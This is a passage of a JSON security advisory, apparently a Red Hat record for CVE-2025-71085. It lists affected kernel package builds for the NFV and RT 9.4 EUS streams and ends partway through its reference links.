"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "RHBZ#2429026",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429026"
},
{
"category": "external",
